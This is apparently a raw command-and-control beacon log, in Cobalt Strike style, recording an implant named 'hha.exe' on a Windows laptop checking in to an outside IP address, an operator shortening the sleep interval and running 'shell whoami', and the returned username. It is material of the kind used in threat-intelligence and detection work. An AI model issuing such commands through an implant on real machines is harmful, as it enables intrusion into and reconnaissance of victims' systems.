12/19 12:42:25 UTC [metadata] 120.230.87.173 <- 192.168.56.107; computer: LAPTOP-P9197NDV; user: jufan; process: hha.exe; pid: 17556; os: Windows; version: 6.2; build: 9200; beacon arch: x64 (x64)
12/19 12:42:28 UTC [input] <s09> sleep 1
12/19 12:42:28 UTC [task] <T1029> Tasked beacon to sleep for 1s
12/19 12:42:33 UTC [checkin] host called home, sent: 16 bytes
12/19 12:42:39 UTC [input] <s09> shell whoami
12/19 12:42:39 UTC [task] <T1059> Tasked beacon to run: whoami
12/19 12:42:39 UTC [checkin] host called home, sent: 37 bytes
12/19 12:42:40 UTC [output]
received output:
laptop-p9197ndv\jufan


